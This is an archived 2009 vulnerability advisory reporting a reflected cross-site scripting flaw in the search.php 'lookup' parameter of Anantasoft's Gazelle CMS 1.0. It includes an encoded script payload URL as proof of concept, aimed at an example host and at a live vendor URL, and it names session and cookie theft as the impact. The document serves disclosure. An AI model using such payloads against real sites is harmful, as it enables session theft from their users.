Anantasoft's Gazelle CMS 1.0 XSS

Anantasoft's Gazelle CMS 1.0 XSS: Posted Sep 3, 2009; Authored by ghostblup; Anantasoft's Gazelle CMS version 1.0 suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 79bd28567ecad20215cff35bb01b17daca030b1381183d1b5dd8107f0a10acde; Download | Favorite | View

Anantasoft's Gazelle CMS 1.0 XSS

                       ____________________
                      / /******ghostblup********\ \
                     / /  i love you  Indonesia   \ \
                   /  /      i love you ratih          \ \
                  /  /            i love you full         \ \
---------------------
--------------------------
============================================
----------------------------------------------------------------------------------------



---------------------------------------------------------------------------------
[ghostblup|adv02] Anantasoft's Gazelle CMS 1.0
---------------------------------------------------------------------------------

Author       : ghostblup
Date          : September, 3 th 2009
Location    : Palembang, Indonesia
my blog     : http://www.ghostblup.blogspot.com
Impact       : Exposure of sensitive information
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Anantasoft's Gazelle CMS
version     : <= 1.0
Vendor     : http://www.anantasoft.com/
Download : http://sourceforge.net/projects/ananta/
License    : GNU General Public License (GPL)

--------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~

Critical Cross-site scripting (XSS).
search.php is not in the filter that allows XSS
/ session/cookies stolen

Poc/Exploit:
~~~~~~~

http://www.example.com.my/[path]/search.php?lookup=%3Cscript%3Ealert(document.cookie)%3B%3C%2Fscript%3E

Demo Live:
~~~~~~~

http://www.anantasoft.com/search.php?lookup=%3Cscript%3Ealert(document.cookie)%3B%3C%2Fscript%3E

Dork:
~~~
Google : N/A


Solution:
~~~~~
- Edit the source code to ensure that input is properly verified.

---------------------------------------------------------------------------

Shoutz:
~~~~~
~ My Love             : Ratih Permata Sari
~ My friends          : Amy,suset,revi,uwix^_^, Blackgirl ,
                              jasakreativkomputer, cyberlau, Vldaz, _persona

~ My inspiration     : K-159 , y3dips,az001,Hero
~ ngetem community, sayap community , echo.or.id , PalComTech.com
~ #ngetem #mr_green #sayap #kegelapan @irc.allnetwork

 ---------------------------------------------------------------------------
Contact:
~~~~~~

ghostblup@gmail.com

My Blog: http://www.ghostblup.blogspot.com
~~~~~~~~~~~~~~~~~~~~~end~~~~~~~~~~~~~~

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Anantasoft's Gazelle CMS 1.0 XSS

Anantasoft's Gazelle CMS 1.0 XSS

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Anantasoft's Gazelle CMS 1.0 XSS

Share This

Anantasoft's Gazelle CMS 1.0 XSS

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems